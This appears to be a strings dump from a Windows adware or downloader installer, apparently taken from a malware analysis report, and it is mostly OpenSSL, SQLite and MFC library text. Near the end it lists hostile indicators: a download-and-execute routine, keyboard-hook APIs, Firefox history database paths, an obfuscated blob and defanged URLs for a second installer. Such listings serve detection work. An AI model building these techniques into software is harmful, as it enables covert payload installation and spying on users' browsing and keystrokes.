.\crypto\engine\eng_pkey.c
Load certs from files in a directory
%s%clx.%s%d
unsupported type
unsupported recpientinfo type
unsupported recipient type
unsupported kek algorithm
unsupported content type
signer certificate not found
private key does not match certificate
no public key
no private key
no msgsigdigest
no key or cert
no key
not supported for this key type
not key transport
msgsigdigest wrong length
msgsigdigest verification failure
msgsigdigest error
invalid key length
invalid encrypted key length
error setting key
error getting public key
certificate verify error
certificate has no keyid
certificate already present
CMS_SIGNERINFO_VERIFY_CERT
CMS_RecipientInfo_set0_pkey
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_ktri_cert_cmp
cms_msgSigDigest_add1
CMS_GET0_CERTIFICATE_CHOICES
CMS_EncryptedData_set1_key
CMS_decrypt_set1_pkey
CMS_decrypt_set1_key
CMS_add1_recipient_cert
CMS_add0_recipient_key
CMS_add0_cert
unsupported requestorname type
no certificates in chain
error parsing url
PARSE_HTTP_LINE1
OCSP_parse_url
OCSP_cert_id_new
unimplemented public key method
invalid cmd number
invalid cmd name
failed loading public key
failed loading private key
cmd not executable
ENGINE_UNLOAD_KEY
ENGINE_load_ssl_client_cert
ENGINE_load_public_key
ENGINE_load_private_key
ENGINE_get_pkey_meth
ENGINE_get_pkey_asn1_meth
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd
ENGINE_cmd_is_executable
unsupported version
unsupported md algorithm
invalid signer certificate purpose
ess signing certificate error
ess add signing cert error
TS_VERIFY_CERT
TS_TST_INFO_set_msg_imprint
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_certs
TS_REQ_set_msg_imprint
TS_MSG_IMPRINT_set_algo
TS_CHECK_SIGNING_CERTS
ESS_SIGNING_CERT_NEW_INIT
ESS_CERT_ID_NEW_INIT
ESS_ADD_SIGNING_CERT
functionality not supported
WIN32_JOINER
unsupported pkcs12 mode
key gen error
PKCS8_add_keyusage
PKCS12_PBE_keyivgen
PKCS12_newpass
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_key_gen_uni
PKCS12_key_gen_asc
PKCS12_add_localkeyid
unsupported option
unable to get issuer keyid
policy syntax not currently supported
operation not defined
no proxy cert policy language defined
no issuer certificate
extension setting not supported
V2I_EXTENDED_KEY_USAGE
V2I_AUTHORITY_KEYID
S2I_SKEY_ID
S2I_ASN1_SKEY_ID
R2I_CERTPOL
unsupported cipher type
unable to find certificate
signing not supported for this key type
operation not supported on this type
no recipient matches key
no recipient matches certificate
encryption not supported for this key type
decrypted key is wrong length
PKCS7_add_certificate
unsupported method
no port specified
no port defined
no accept port specified
broken pipe
BIO_get_port
ECDH_compute_key
data too large for key size
unsupported field
passed null parameter
not a supported NIST prime
missing private key
keys not set
invalid private key
PKEY_EC_SIGN
PKEY_EC_PARAMGEN
PKEY_EC_KEYGEN
PKEY_EC_DERIVE
PKEY_EC_CTRL_STR
PKEY_EC_CTRL
o2i_ECPublicKey
i2o_ECPublicKey
i2d_ECPrivateKey
EC_KEY_print_fp
EC_KEY_print
EC_KEY_new
EC_KEY_generate_key
EC_KEY_copy
EC_KEY_check_key
ECKEY_TYPE2PARAM
ECKEY_PUB_ENCODE
ECKEY_PUB_DECODE
ECKEY_PRIV_ENCODE
ECKEY_PRIV_DECODE
ECKEY_PARAM_DECODE
ECKEY_PARAM2TYPE
DO_EC_KEY_PRINT
d2i_ECPrivateKey
zlib not supported
wrong public key type
unsupported public key type
unsupported encryption algorithm
unsupported any defined by type
unknown public key type
unable to decode rsa private key
unable to decode rsa key
streaming not supported
private key header missing
digest and key type not supported
bad password read
X509_PKEY_new
i2d_RSA_PUBKEY
i2d_PublicKey
i2d_PrivateKey
i2d_EC_PUBKEY
i2d_DSA_PUBKEY
d2i_X509_PKEY
d2i_PublicKey
d2i_PrivateKey
d2i_AutoPrivateKey
unsupported algorithm
unknown key type
unable to get certs public key
public key encode error
public key decode error
no cert set for us to verify
method not supported
loading cert dir
key values mismatch
key type mismatch
cert already in hash table
cant check dh key
X509_verify_cert
X509_STORE_add_cert
X509_REQ_check_private_key
X509_PUBKEY_set
X509_PUBKEY_get
X509_load_cert_file
X509_load_cert_crl_file
X509_get_pubkey_parameters
X509_check_private_key
GET_CERT_BY_SUBJECT
ADD_CERT_DIR
PKEY_DSA_KEYGEN
PKEY_DSA_CTRL
unsupported key components
unsupported encryption
read key
public key no rsa
problems getting password
keyblob too short
keyblob header parse error
expecting public key blob
expecting private key blob
error converting private key
PEM_WRITE_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_PK8PKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
DO_PK8PKEY_FP
DO_PK8PKEY
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_bio
unsupported salt type
unsupported private key algorithm
unsupported prf
unsupported key size
unsupported key derivation function
unsupported keylength
unsuported number of rounds
private key encode error
private key decode error
operaton not initialized
operation not supported for this keytype
no operation set
no key set
keygen failure
invalid operation
expecting a ec key
expecting a ecdsa key
expecting a dsa key
expecting a dh key
expecting an rsa key
different key types
ctrl operation not implemented
command not supported
camellia key setup failed
bn pubkey error
bad key length
aes key setup failed
PKEY_SET_TYPE
PKCS5_v2_PBE_keyivgen
PKCS5_PBE_keyivgen
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_new
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_get1_RSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DH
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_init
EVP_PKEY_derive
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl
EVP_PKEY_copy_parameters
EVP_PKEY2PKCS8_broken
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY
EVP_CIPHER_CTX_set_key_length
ECKEY_PKEY2PKCS8
ECDSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSAPKEY2PKCS8
D2I_PKEY
CAMELLIA_INIT_KEY
AES_INIT_KEY
invalid public key
PKEY_DH_KEYGEN
PKEY_DH_DERIVE
GENERATE_KEY
COMPUTE_KEY
rsa operations not supported
key size too small
invalid keybits
illegal or unsupported padding mode
digest too big for rsa key
data too small for key size
RSA_generate_key
RSA_check_key
RSA_BUILTIN_KEYGEN
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_SIGN
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-3.7.8
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
!"#$%&'()* ,-./:;?@[\]^_`{|}~
%d.%d.%d.%d
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Classes\.html
debug.txt
unexpected key token
expected key token
,[]{}#&*!|>'"%@`
?,[]{}#&*!|>'"%@`
tag:yaml.org,2002:
#;/?:@&= $,_.!~*'()[]
#;/?:@&= $_.~*'
illegal map key
?:,]}%@`
large file support is disabled
unknown operation
SQL logic error or missing database
foreign_keys
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_log
sqlite_source_id
sqlite_version
sqlite_stat2
sqlite_attach
sqlite_detach
sqlite_stat1
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_table
RowKey
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjX
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot %s savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl, idx, stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
DELETE FROM %s.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid)
%s (rowid>?)
%s (rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
1.2.5
C:\appbuilder_v2\src\ComBroadcaster-1.10\Release\ComBroadcaster.pdb
SHELL32.dll
RPCRT4.dll
GetWindowsDirectoryW
GetCPInfo
PeekNamedPipe
GetProcessHeap
KERNEL32.dll
EnumChildWindows
EnumWindows
UnhookWindowsHookEx
GetKeyState
SetWindowsHookExW
GetAsyncKeyState
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardState
CreateDialogIndirectParamW
GetKeyNameTextW
MapVirtualKeyExW
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
COMDLG32.dll
RegOpenKeyExW
RegCloseKey
RegOpenKeyExA
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteW
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
MSIMG32.dll
COMCTL32.dll
OLEACC.dll
GdiplusShutdown
gdiplus.dll
IMM32.dll
SHFileOperationW
VERSION.dll
WS2_32.dll
WINMM.dll
WLDAP32.dll
ReportEventA
.?AUDWebBrowserEvents2@@
.PAVCException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.?AVCCmdTarget@@
.PAVCArchiveException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCFileException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
.?AV?$CAtlExeModuleT@VCDummyModule@@@ATL@@
.?AVUrlCatcher@@
Inappropriate I/O control opera
XiCCA"ggfynnr`nnt/bbA llu#pp1u00I`SSwXnnM\llv[99V)ggsmtt8FttGVNNV;WW1#VVs llwsjjaBoovPXXBruuH~00V{vvm$ddp%WW3?MME0kkpHoo3SkkrvttAwppfLddo;llJvFFE{uuJ=LLi wwf*ttP-uuJiXXx;WWz&ddyhxx38SSPXXXZYjjpqQQ1&jjJRxxJARRIpWWBcnnorppzgg1Gww2jMMRRCCs,ddL`ppNVSSEFoowqNNgijjKsllk"ppfPnn8kXXHZjjNGWWeyLL67mmN|ggM\XX1{qqW}vvHvggw WWNUeePnCCrfXXKRppddddU0CCH.VVP'ggseeV@jjGeVV4fxx1Dddk*uupXjjGnjj1illkSppz>ttA*WWrrMM24XXw_xxdySSe qqyebbGfqqamvvGzggz/ggvYXXf,ww4(jjoTmmcEaaV SSrvnnJcttw[RRt%llzrooRtQQN]bb6~QQAceeJ8XXvsFF3(SSpEbbR_SSx4ddJBbbp;jjZ'ppJ3LLbJuuN(nn5cQQ27oo3*WWxVVVn jj2MbbZ6QQJfjjfmww2fRRAkhhJ}oo3LkkmMxxU|XXf500KdCCeT33gYppB-xxlRjjpZnnpoQQ2F66h-ppA!MMBOyysgggvNggz/ggg[CCc=jjx)XXJvRRBPQQ1"ggV\ggJpww3cvveb33fXmmw&EEVxSSsntt8DttNygg1CggK/jjN?llx=ggLQoo1M33o[SS3bddqSnnx'XXb6ppKvVVd,ooN^llh9mmz XXG$WWZ&nnH}jjf#xxr|xx3,aa2Zpp3xXXx,wwpHaaH4pp23RRz*CCroNNYsCCJ*LL3Rww2lllt{mmJ(99HkwwvRXXmpxx4_jjbZppcOnnehjjzsggm-uuzgVVj1mmKSllp@mm3 ggL#llwf3hmmG'VVWWkkv5NNuDmmJ1NNkgbb2DggGRnnK,NNm6bbwgnn5{mmNM66H'ccGnXXNioo1l11VIllcFqqw|CCH4VVJ(vvJU00z3CCw"jjfxwwKqoo1?WWpfqqkSxxwJjjc^ppZ`qq3>xxKzVV5_ooZ:qqq_ww1PttP@XXr=XXUjvvpwxxm*ttx0aaP^nnvI66a'SSGkqqKiuuGZllbBjjsAxxGcxxJWRRzkSSx*LLvfnnK1NNGtmm3eNNCpSSZ:ggCAjjwALL3JQQH/NNrGXX2{LLnZkkc}XX4|hhNjeeEJggpjjz0WWKpqqbeppm%xx2`hhH$llIuuJL33P8XXw|66fXvvHm00cswwm_nns QQm|LLR*ppH nnf/ccK~XX5zbb2axxp5CCm@nnl$nnz6qqigXXKEggLyuuc]VVaNkkrEqqk(llZIVVgyoo2oww67SSrSggZ#ccJsnn2^vvf`ggP?ooe{LLK5ooKQHHZ!QQf1RRxVoo3,lluhppZtqqJ-SSH6llVvCCvq33gOjjxQjjwxCCGnXXWNCCHjVVM~uu4WxxxJggv7LL5#SSeg553?XXJ#ggj^xxfGEE3NttxA66mVjjrfllVTxxdvddH)wwrZNNhVQQJ\jjaJSSHZNNionndCooA66TPwwJs335TXXw2oo5hSSKfSSP6CCBvxx2;SSH!ggb(jjmSxxTpCCJ{xxvGllf5XXYYggK7xxo0ppfO996>llHA66z!uumÝY#XXzvXXm%WWcgdd8_vvK\MMEdggw6FFZTuu3hllT3ppHEqqv|bbH-uu5/llmPdde9nnZ$ww2hoo4,ww3wQQd(VVh\jjB~oo4pnnrsuu1dnnc0LLC0nn3>ggn"xxBppsAxxmCttBAEEBnbbcUqqE(llf 00IcbbvsNNY{ttGtMMBKXXcoqqH4yyJ.ddHnSS27II6\nnJj00A!nnc[nnNmSSB=66G,QQ2J11Bjyys$ggV4SSrNqqk*bbvd33N%ttG%MMBFnn2s33Zdnndw00Amnnxh99E{uuzfwwEnuupbaaENjjZlSSB$yyscggVRSSr@qqo"bbcHgg12QQJ xxAQttG3MMBNnnvO00A(nnc8LLT0ttBTEEBWbbc$qqECxxf]xxZ|XXs$tt8!ttKkxxEznnsZ66B&nnc}llV`uuz8aaEUuuz5ttYVbb2-00IrttBxEEB_bbc;qqEixxJ|xxA!SS2JNNT\QQB)tt88ttG)eeY/uuGzaaBiyyslggG vvxvnn3SWWdSjjfmggvz00k&XXH/dd88jjZWW13nnZouuHNRRkfooH@jjKGvvcQnnUCnnp#llIGmmf*33uybb1@00Bwkkx=NNkAvvw4HHZkllxJnne\wwrHVVrOmmc/MM17ggv;FFNGppvtuuRgQQ1Kddz7XX3N66M,bb2n33ZnxxKkLLzsttp[XX3QQQ1}ddu[xx44llJMQQJ-NNCybbN}FF5JxxdcXXz1ppZ ggu/jjNrjjL-ppcXNNZ}jjdANN1$mmK5FFN.SS4SXX3@ggB)LLseCCeGjjBBmmz&qqV,wwrWooZ^uupMNNy#CCK>LLW[bbc3SSPRuucGLL3kSSN^XXR"ggK"xxcgbbZ;ttZISSf/NNziCCwhllTpjjwSjj6dCCG/HHPoggG)XXf_mm3aVVHOnnHP00NCWWHDdddEuuw:llM>wwJmRRsann1HxxBfCCw&VVWJvvz@nnA~pp2YLLVjllK4nnH[ppBxttUIId1xxeeRRM-WWfWVVPASSNwggiallHx33w2bbvq66dKQQv
9-9U9}9
; ;$;(;,;0;
; ;$;(;,;
1%5u5z5
: :$:(:,:0:
>@>(?,?0?4?
5P5U5
8 9$9(9,9094989
: :$:(:,:0:4:8:
8#8@8/9\9
1%1S1b1
5$51565\5
0"0'03080{0
7‡8c8p8y8
3#3
6"6-6
#000@0{0
0"131@1~1
7*8084888
0#1*1?1{1
3#33383@3
0 0$0(0,00040
3 3$3(3,303\3
= =$=(=,=0=
3'313!5 5
= =$=(=,=0=4=8=
5_5M5 7
,0004080
3 3$3(3,303
7 8'80898[=
= =$=(=,=0=4=8=
$0(0,0004080
5 5$5(5,505
3%3x4
4 4$4(4,4044484
: :$:(:,:
; ;$;,;0;8;
>(>,>0>4>|>
>$>(>,>0>4>8>
2 2$2(2,202
?$?,?8?\?|?
0 0(000
5$5,545\5
; ;,;0;8;
0 0@0\0|0
background-url
CB_DownloadAndExec
CB_NavOpenUrl
CB_OpenUrl
%s\Google\Chrome\Application\chrome.exe
\Mozilla Firefox\firefox.exe
\places.sqlite
\*.default
Firefox
Ncomctl32.dll
Ncomdlg32.dll
Nshell32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Advapi32.dll
accKeyboardShortcut
wuser32.dll
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
kernel32.dll
Nf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
dwmapi.dll
UxTheme.dll
eShell32.dll
yDWrite.dll
D2D1.dll
%s:%x:%x:%x:%x
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
MFCLink_UrlPrefix
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
&%d %s
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
%sPane-%d%x
%sPane-%d
ShowCmd
UHex={X,X,X}
R%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
%c%d%c%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
\RICHED20.DLL
windows
\f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
RGB(%d, %d, %d)
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
Invalid parameter or key doesn't exist.
Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.
%s-tmp
"%s" "%s"
%s has stopped working
Error launching CrashSender.exe
The operation was cancelled by client.
Couldn't launch CrashSender.exe process.
Couldn't set C   exception handlers for main execution thread.
Couldn't create crash report directory.
%s\CrashRpt\UnsentCrashReports\%s_%s
Local\CrashRptEvent_%s
Couldn't load dbghelp.dll.
crashrpt_lang.ini
CrashSender.exe is not found in the specified path.
CrashSender%d.exe
%s %s Error Report
The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.
Invalid registry key or invalid destination file is specified.
The registry key coudn't be open.
Empty subkey is not allowed.
HKEY_CURRENT_USER\
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%u.%u.%u.%u
Mozilla
Chrome
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
777705555443332
5555443332
5555443332
ydebug.txt
\%s\%s\%s
\Internet Explorer\iexplore.exe
install.bat
n.folder
%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe
nsq3D.tmp_240:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
\"%CurrentUserName%"\LOCALS~1\Temp\nsd40.tmp\nsCBHTML5.dll
hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd40.tmp\nsCBHTML5.dll
